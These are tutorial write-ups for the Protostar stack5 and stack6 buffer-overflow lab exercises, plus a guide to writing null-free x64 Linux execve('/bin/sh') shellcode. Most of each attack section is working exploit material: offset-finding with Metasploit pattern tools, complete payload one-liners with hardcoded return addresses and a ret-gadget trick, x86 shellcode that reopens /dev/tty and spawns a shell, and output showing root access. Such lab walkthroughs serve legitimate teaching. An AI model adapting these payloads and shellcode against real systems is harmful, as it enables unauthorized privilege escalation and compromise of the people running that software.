Now we need to find a jmp esp gadget. I’ll be using peda, as it is more informative than standard gdb and has some other features.

I copied the executable file to my local machine to find offsets:

$ scp user@<ip>:/opt/protostar/bin/stack6 ./

From the command below we know that our stack has no NX bit set:

$ scanelf -e stack6
 TYPE   STK/REL/PTL FILE
ET_EXEC RWX --- RW- stack6

Additionally, you can install and run the execstack program:

$ sudo apt install execstack
$ execstack stack6
X stack6

That means that we can execute code from the stack.

Now we run gdb and look for gadgets:

$ gdb stack6
...
gdb-peda$ dumprop
Warning: this can be very slow, do not run for large memory range
Writing ROP gadgets to file: stack6-rop.txt ...
0x80484f9: ret
0x804835e: leave; ret
0x80484f7: dec ecx; ret
0x8048453: pop ebp; ret
0x8048480: ror cl,1; ret
0x8048512: in eax,0x5d; ret
0x804857b: sbb al,0x24; ret
0x804857a: mov ebx,[esp]; ret
...
0x80484f4: enter 0xfffe,0xff; leave; ret
0x8048576: pop esi; pop edi; pop ebp; ret
--More--(25/85)

We see that there is no jmp esp gadget, but the first one is ret, and it looks promising. It is not on the stack, and it will jump to the next address on the stack. If we use it, our exploit should look like JUNK + ADDR_OF_GADGET + ADDR_OF_SHELLCODE + SHELLCODE.

The address of the ret gadget is 0x80484f9.
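How the two consecutive ret instructions walk over the stack can be modelled in a few lines of Python 3. This is a toy model, not a debugger: the stack is a plain dictionary, and the shellcode address used here is the one found in the gdb session later in this walkthrough.

```python
RET_GADGET = 0x080484f9       # address of the ret gadget found above
SHELLCODE_ADDR = 0xbffffbe4   # where the shellcode ends up (see the gdb session later on)


def ret(stack, esp):
    """Model x86 ret: pop the word at esp into eip, then add 4 to esp."""
    return stack[esp], esp + 4


# Layout after the overflow: ADDR_OF_GADGET, ADDR_OF_SHELLCODE, SHELLCODE.
ret_slot = SHELLCODE_ADDR - 8
stack = {
    ret_slot: RET_GADGET,          # overwritten return address
    ret_slot + 4: SHELLCODE_ADDR,  # consumed by the gadget's own ret
}

eip, esp = ret(stack, ret_slot)    # the vulnerable function returns
first_jump = eip
eip, esp = ret(stack, esp)         # the gadget executes its single ret

print(hex(first_jump), hex(eip), hex(esp))
```

The first return address is outside the stack, so it passes the check, and the second ret lands on the stack without being checked.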

Now we find offset before eip like we did for stack5:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
$ echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag" > /tmp/exploit.txt
$ gdb stack6
...
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack6 < /tmp/exploit.txt
input path please: got path Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A6Ac72Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Program received signal SIGSEGV, Segmentation fault.
0x37634136 in ?? ()
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37634136
[*] Exact match at offset 80

So we need to write 80 bytes before the return address. Now we can create our exploit, with AAAA as a placeholder for the shellcode address:

python -c "print 'A'*80 + '\xf9\x84\x04\x08' + 'AAAA' + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt

Addresses in the debugger might differ because of environment variables. So we need to unset the unneeded variables and run the program:

(gdb) show env
LINES=42
COLUMNS=71
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack6 < /tmp/exploit.txt
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��AAAA1�1۰̀Sh/ttyh/dev��1�f�'�̀1�Ph//shh/bin��PS�ᙰ


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/1x $esp
0xbffffbe4:    0xdb31c031

So the shellcode is at 0xbffffbe4. Replace AAAA with this address. Don’t forget we are on a little-endian machine:

python -c "print 'A'*80 + '\xf9\x84\x04\x08' + '\xe4\xfb\xff\xbf' + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt
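The same layout can be assembled in Python 3, where the payload has to be handled as bytes rather than as a printed string. In the sketch below, build_payload is a hypothetical helper, and a single 0xcc byte is used as a stand-in for the real shellcode from the command above.

```python
import struct

OFFSET = 80                   # bytes before the saved return address
RET_GADGET = 0x080484f9       # address of the ret gadget
SHELLCODE_ADDR = 0xbffffbe4   # esp value observed after the crash in gdb


def build_payload(shellcode):
    """JUNK + ADDR_OF_GADGET + ADDR_OF_SHELLCODE + SHELLCODE."""
    return (
        b"A" * OFFSET
        + struct.pack("<I", RET_GADGET)
        + struct.pack("<I", SHELLCODE_ADDR)
        + shellcode
    )


# Placeholder only: one int3 byte instead of the real shellcode.
payload = build_payload(b"\xcc")
print(len(payload))
```

To save such a payload, open the file in binary mode (for example open("/tmp/exploit.txt", "wb")); print would re-encode the non-ASCII bytes.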

Run the program with exploit.txt as input and get root:

$ /opt/protostar/bin/stack6 < /tmp/exploit.txt
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA������1�1۰̀Sh/ttyh/dev��1�f�'�̀1�Ph//shh/bin��PS�ᙰ

# id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)

You can also run the exploit like this:

(python -c "print 'A'*80 + '\xf9\x84\x04\x08' + '\xe4\xfb\xff\xbf' + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'"; cat;) | /opt/protostar/bin/stack6

Exploit Exercises — Protostar Stack 5

The first four levels of protostar were pretty straightforward, and the real buffer overflows start with the 5th. This is a description of how I completed it.

We have the following code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

It creates a buffer and reads into it using gets(). There’s a buffer overflow vulnerability here, because gets() does not check the bounds of the buffer while reading.

We begin exploitation by finding an offset to eip. I used a script that generates a unique string, which we then pass to the executable:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Now we create a pattern.txt file containing the generated pattern:

$ echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag" > /tmp/pattern.txt

Then we run stack5 in gdb and use pattern.txt as input:

$ gdb stack5
...
(gdb) r < /tmp/pattern.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/pattern.txt

Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()

It should segfault at 0x63413563. Now we search for these bytes in the pattern:

# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x63413563
[*] Exact match at offset 76

The output above means that we need to rewrite 76 bytes before rewriting eip.

Now we generate our test exploit, which looks like JUNK + RET + NOPS + SHELLCODE:

$ python -c "print 'A'*76 + 'BBBB' + '\x90'*10 + 'SHELLCODE'" > /tmp/exploit.txt
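The layout of this test payload, and the position where the NOPs begin, can be checked with a short Python 3 sketch. The variable names are illustrative; BBBB and the SHELLCODE string are the same placeholders as in the command above.

```python
OFFSET = 76   # bytes before the saved return address (from pattern_offset)

junk = b"A" * OFFSET
ret = b"BBBB"            # placeholder for the return address
nops = b"\x90" * 10      # short NOP sled
shellcode = b"SHELLCODE" # placeholder string, not real shellcode

payload = junk + ret + nops + shellcode

# Position of the first NOP inside the payload.
nop_start = payload.index(b"\x90")
print(len(payload), nop_start)
```

The NOPs start right after the 4-byte return address, which is where esp points once ret has popped that address.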

We can see that our nops and the SHELLCODE string are at 0xbffff6a0:

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/20x $esp
0xbffff6a0: 0x9090  0x9090  0x9090  0x9090  0x9090  0x4853  0x4c45  0x434c
0xbffff6b0: 0x444f  0x0045  0xffff  0xffff  0xeff4  0xb7ff  0x8232  0x0804
0xbffff6c0: 0x0001  0x0000  0xf700  0xbfff

I tried using shellcodes I found on shellstorm. It crashed at the point where it tried to read input. My guess is that bash/dash checks for this and just silently exits when something is wrong with stdin. So I used a shellcode from here. It reopens stdin, so it should work fine.

So we modify exploit.txt file with the correct return address and the shellcode.

$ python -c "print 'A'*76 + '\xa0\xf6\xff\xbf' + '\x90'*10 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt

After running stack5 with exploit.txt as input inside gdb, we drop into sh:

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt
Executing new program: /bin/dash
$

The exploit worked in gdb, but when I tried to run it from my console it gave me a segfault:

$ /opt/protostar/bin/stack5 < /tmp/exploit.txt
Segmentation fault

After a while, I found out that addresses inside and outside of gdb are different. In particular, the stack addresses in the debugger may not match the addresses during normal execution. This happens because the operating system loader places both environment variables and program arguments before the beginning of the stack.

For example if we look at variables loaded in gdb we see some artifacts:

(gdb) show env
LC_PAPER=en_GB.UTF-8
LC_ADDRESS=en_GB.UTF-8
LC_MONETARY=en_GB.UTF-8
SHELL=/bin/sh
---CUT OUT---
LC_CTYPE=en_US.UTF-8
LC_TIME=en_GB.UTF-8
LC_NAME=en_GB.UTF-8
OLDPWD=/home/user/peda
_=/usr/bin/gdb
LINES=24
COLUMNS=106

At the end, we can see two variables that are not set during normal execution. To make the stacks match, I just unset them using the following commands:

(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) show env
LC_PAPER=en_GB.UTF-8
LC_ADDRESS=en_GB.UTF-8
LC_MONETARY=en_GB.UTF-8
SHELL=/bin/sh
---CUT OUT---
LC_CTYPE=en_US.UTF-8
LC_TIME=en_GB.UTF-8
LC_NAME=en_GB.UTF-8
OLDPWD=/home/user/peda
_=/usr/bin/gdb

Now if we run our program in gdb, we get an error like the previous one. It says we have the wrong return address:

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt

Program received signal SIGSEGV, Segmentation fault.
0xbffff6bc in ?? ()

Now we need to find the correct return address again. We generate a new exploit.txt with BBBB in place of the return address:

$ python -c "print 'A'*76 + 'BBBB' + '\x90'*10 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt

Don’t forget to unset these environment variables:

(gdb) unset env LINES
(gdb) unset env COLUMNS

Run stack5 with our exploit.txt file and examine stack after the program crashes:

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/10x $esp
0xbffff6c0: 0x90909090  0x90909090  0xc0319090  0x06b0db31
0xbffff6d0: 0x685380cd  0x7974742f  0x65642f68  0x31e38976
0xbffff6e0: 0x12b966c9  0xcd05b027

Our shellcode (which has nops at the beginning) starts at 0xbffff6c0. Thus, this is the return address we need.
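The address has to be written into the payload in little-endian byte order, which is why 0xbffff6c0 appears as \xc0\xf6\xff\xbf in the exploit command. A small Python 3 sketch of that packing step follows. The variable names are only illustrative, and the shellcode itself is left out.

```python
import struct

ret_addr = 0xbffff6c0                   # start of the NOP sled seen in gdb
packed = struct.pack("<I", ret_addr)    # 32-bit little-endian encoding

# 76 filler bytes up to the saved return address, then the address, then NOPs
payload = b"A" * 76 + packed + b"\x90" * 10

print(packed)  # b'\xc0\xf6\xff\xbf'
```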

There’s a difference between calling ./stack5 and /path/to/stack5: since argv[0] holds the program name exactly as you invoked it, you need to use the same invocation string in both cases. gdb uses absolute paths for calling programs. That’s why you need to use /path/to/stack5.

Now we can run our exploit:

$ (python -c "print 'A'*76 + '\xc0\xf6\xff\xbf' + '\x90'*10 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'";cat;) | /opt/protostar/bin/stack5
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
whoami
root

Writing Shellcode for Linux x64

To assemble and link the shellcode, we will use nasm and ld. To test it, we will write a small C program, which we compile with gcc. For some tests we need rasm2, which is part of the radare2 framework. The auxiliary functions will be written in Python.

What’s new in x64?

x64 is an extension of the Intel IA-32 architecture. Its main distinguishing feature is support for 64-bit general-purpose registers, 64-bit integer arithmetic and logic operations, and 64-bit virtual addresses.

All the 32-bit general-purpose registers remain available, and each also gets a 64-bit extended version: rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp. In addition, there are eight new general-purpose registers: r8, r9, r10, r11, r12, r13, r14, r15.

Since the addresses are now 64-bit, values on the stack may be 8 bytes long.

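A new calling convention was introduced with the 64-bit architecture. On Linux (the System V AMD64 ABI), the first six integer or pointer arguments of a function are passed in the registers rdi, rsi, rdx, rcx, r8 and r9, and the return value comes back in rax.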

What is syscall

A syscall is the mechanism user-mode code uses to ask the Linux kernel for a service. It covers tasks such as I/O, reading and writing files, starting and terminating programs, and working with memory and the network. To perform a syscall you need to:

  1. Load the number of the required function into the register rax;
  2. Load the input parameters into other registers;
  3. Trigger the call: 32-bit code raises interrupt 0x80, while x64 code uses the syscall instruction.
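As a rough illustration of steps 1 and 2 on x64 Linux, the Python 3 sketch below maps a syscall number and its arguments onto registers. The argument order rdi, rsi, rdx, r10, r8, r9 is the one used for x64 Linux syscalls. The helper name syscall_registers is hypothetical, and nothing here actually talks to the kernel.

```python
# Registers that carry syscall arguments on x64 Linux, in order
SYSCALL_ARG_REGS = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]

def syscall_registers(number, *args):
    """Return the register assignment for a syscall with the given arguments."""
    if len(args) > len(SYSCALL_ARG_REGS):
        raise ValueError("a syscall takes at most six arguments")
    regs = {"rax": number}
    regs.update(zip(SYSCALL_ARG_REGS, args))
    return regs

# write(1, buf, 5): write has the number 1 on x64 Linux
print(syscall_registers(1, 1, "buf", 5))
# {'rax': 1, 'rdi': 1, 'rsi': 'buf', 'rdx': 5}
```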

Unlike Windows where you need to find the address of the required functions, in Linux everything is much simpler.

Syscall functions can be found here.

What is execve?

If you look at shellcodes here, you’ll see many of them use the function execve().

execve() has the following prototype:

int execve(const char * filename, char * const argv[], char * const envp[]);

It executes the program referred to by filename, which can be either an executable binary or a script that begins with a line of the form #! interpreter [optional-arg].

argv[] is an array of argument strings passed to the new program; it is the same argv[] that we see in C, Python, etc.

envp[] is an array of strings describing the environment. We do not use it here, so it will be set to null.

Basic requirements

We are going to write position-independent code so that our shellcode can run anywhere in the program. Position-independent code is code that executes correctly regardless of the address it is loaded at.

Shellcode is often delivered through functions like strcpy(). These functions treat bytes such as 0x00, 0x0A and 0x0D as terminators (depending on the platform and the function), so it is better to avoid such values. Otherwise, the function may copy our shellcode incompletely. Consider the following example:

rasm2 -a x86 -b 64 'push 0x00'
6a00

As you can see, push 0x00 assembles into the bytes 6a 00. If we used this instruction, our shellcode would not work, because strcpy would stop copying at the 0x00 byte.
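A quick way to check candidate shellcode for such bytes is sketched below in Python 3. The set of bad bytes is the one listed above, and the helper name find_bad_bytes is hypothetical.

```python
BAD_BYTES = b"\x00\x0a\x0d"

def find_bad_bytes(code, bad=BAD_BYTES):
    """Return (offset, byte) pairs for every bad byte found in code."""
    return [(i, b) for i, b in enumerate(code) if b in bad]

# The bytes rasm2 produced for push 0x00
print(find_bad_bytes(bytes.fromhex("6a00")))  # [(1, 0)]
```

An empty list means the bytes are safe with respect to the chosen set. The right set depends on the function that copies the payload.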

The shellcode can not use hardcoded addresses because we do not know these addresses in advance. For this reason, all addresses in the shellcode are obtained dynamically and stored on the stack.

Combining it all

The first step is to prepare the arguments for the function execve() and then arrange them properly on the stack. The call will be:

execve("/bin/sh", ["/bin/sh"], null);

The second parameter is an array of argv[]. The first element of the array contains the path to the executable file.

The third parameter is the information about the environment, we do not need it, so it will be null.

First, we need a zero value. We cannot use code like mov eax, 0x00, because the encoded instruction would contain null bytes, so we use the following statement, which zeroes a register without them:

xor rdx, rdx

We can leave the value in the register rdx, since we need the null value both as the third parameter and as a string terminator (null byte).

To reverse the string and convert it to hex, you can use this Python function:

def rev_str(s):
    # Python 2 only: reverse the string, then hex-encode it
    rev = s[::-1]
    return rev.encode("hex")

Call this function on /bin/sh:

>>> rev.rev_str("/bin/sh")
'68732f6e69622f'

This string is 7 bytes long. Now, consider what would happen if we tried to put it on the stack:

rasm2 -a x86 -b 64 'mov rax, 0x68732f6e69622f; push rax'
48b82f62696e2f73680050

There is a zero byte that would break our shellcode. To avoid this, we can use the fact that Linux ignores successive slashes (e.g. /bin/sh and /bin//sh are the same thing).

>>> rev.rev_str("/bin//sh")
'68732f2f6e69622f'

Now we have a string of 8 bytes. Let’s see what happens if we put it on the stack:

rasm2 -a x86 -b 64 'mov rax, 0x68732f2f6e69622f; push rax'
48b82f62696e2f2f736850

No zero bytes.
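The string has to be reversed because x64 is little-endian: when the register is pushed, its lowest byte ends up at the lowest address. Here is a Python 3 sketch of the same calculation (rev_str above relies on Python 2; the helper name as_immediate is made up here):

```python
def as_immediate(s):
    """Interpret an ASCII string as a little-endian integer."""
    return int.from_bytes(s.encode("ascii"), "little")

print(hex(as_immediate("/bin/sh")))    # 0x68732f6e69622f
print(hex(as_immediate("/bin//sh")))   # 0x68732f2f6e69622f

# The 7-byte value still occupies a full 8-byte register, so it is padded with a zero
padded = as_immediate("/bin/sh").to_bytes(8, "little")
print(padded)                          # b'/bin/sh\x00'
```

The padding byte is the zero that showed up in the first rasm2 output.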

Then we look up information about the function execve(). We need its function number, which goes into rax: execve has the number 59. Its three arguments are passed in registers: filename in rdi, argv in rsi and envp in rdx.

Now, we assemble all the pieces together.

Push the null terminator of the string (remember that everything is done in reverse order):

xor rdx, rdx
push rdx

Push the string /bin//sh:

mov rax, 0x68732f2f6e69622f
push rax

We get the address of the string /bin//sh from rsp and immediately put it in rdi:

mov rdi, rsp

The register rsi needs to contain a pointer to an array of strings. In our case, this array contains only the path to the executable file, so it is enough to store the address of the string on the stack and pass the address of that slot (in C terms, a pointer to a pointer). We already have the address of the string: it was saved in the register rdi. The argv array must be terminated by a null pointer, which we still have in the register rdx. So we can do:

push rdx
push rdi
mov rsi, rsp

Now rsi holds an address on the stack at which a pointer to the string /bin//sh is stored.
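To check the layout, the pushes so far can be replayed in a tiny Python 3 model of the stack. This is only a sketch: the Stack class and the starting address are invented for illustration, and real addresses will differ.

```python
import struct

class Stack:
    """Tiny model of a downward-growing stack of 8-byte slots."""
    def __init__(self, rsp):
        self.rsp = rsp
        self.mem = {}

    def push(self, value):
        self.rsp -= 8
        self.mem[self.rsp] = value

stack = Stack(rsp=0x7ffe0000)    # arbitrary, made-up starting address
rdx = 0                          # xor rdx, rdx

stack.push(rdx)                  # string terminator
stack.push(0x68732f2f6e69622f)   # "/bin//sh"
rdi = stack.rsp                  # mov rdi, rsp  -> filename
stack.push(rdx)                  # argv[1] = NULL
stack.push(rdi)                  # argv[0] = pointer to the string
rsi = stack.rsp                  # mov rsi, rsp  -> argv

# Dump the slots from the lowest address upwards
for addr in sorted(stack.mem):
    print(hex(addr), struct.pack("<Q", stack.mem[addr]))
```

Reading upwards from rsi, the slots are the pointer to the string, a null pointer, the string itself and its terminator.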

Now we put the number of the execve() function into rax:

xor rax, rax
mov al, 0x3b

We should have a file like this:

; runs /bin/sh

section .text
    global _start

_start:

    xor rdx, rdx
    push rdx
    mov rax, 0x68732f2f6e69622f
    push rax
    mov rdi, rsp
    push rdx
    push rdi
    mov rsi, rsp
    xor rax, rax
    mov al, 0x3b
    syscall

Let’s assemble and link it for x64:

nasm -f elf64 example.asm
ld -m elf_x86_64 -s -o example example.o

Now, we can use objdump -d example to see the resulting file:

Disassembly of section .text:
0000000000400080 <.text>:
400080: 48 31 d2 xor %rdx, %rdx
400083: 52 push %rdx
400084: 48 b8 2f 62 69 6e 2f movabs $0x68732f2f6e69622f, %rax
40008b: 2f 73 68
40008e: 50 push %rax
40008f: 48 89 e7 mov %rsp, %rdi
400092: 52 push %rdx
400093: 57 push %rdi
400094: 48 89 e6 mov %rsp, %rsi
400097: 48 31 c0 xor %rax, %rax
40009a: b0 3b mov $0x3b, %al
40009c: 0f 05 syscall

We can use the following Bash one-liner to get a shellcode like \x11\x22 ... from the binary:

for i in `objdump -d example | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$'`; do echo -n "\x$i"; done

The result is:

\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50
\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05
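The same result can be cross-checked without objdump. The Python 3 sketch below takes the instruction bytes from the disassembly above, formats them as \x escapes and confirms that none of them is zero. The variable names are illustrative only.

```python
code = bytes.fromhex(
    "4831d2"                  # xor rdx, rdx
    "52"                      # push rdx
    "48b82f62696e2f2f7368"    # mov rax, 0x68732f2f6e69622f
    "50"                      # push rax
    "4889e7"                  # mov rdi, rsp
    "52"                      # push rdx
    "57"                      # push rdi
    "4889e6"                  # mov rsi, rsp
    "4831c0"                  # xor rax, rax
    "b03b"                    # mov al, 0x3b
    "0f05"                    # syscall
)

escaped = "".join("\\x%02x" % b for b in code)
print(len(code), 0 in code)   # 30 False
print(escaped)
```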

Testing shellcode

We can use the following C program to test the shellcode (replace the string SHELLCODE with your shellcode):

/* Shellcode test program */
char shellcode[] = "SHELLCODE";

int main(void) {
    /* Treat the byte array as a function and call it */
    void (*f)(void) = (void (*)(void))shellcode;
    f();
    return 0;
}

Then compile:

gcc -m64 -fno-stack-protector -z execstack -o shellcode_test shellcode_test.c

The resulting program is shellcode_test. When you run the program, you should get sh.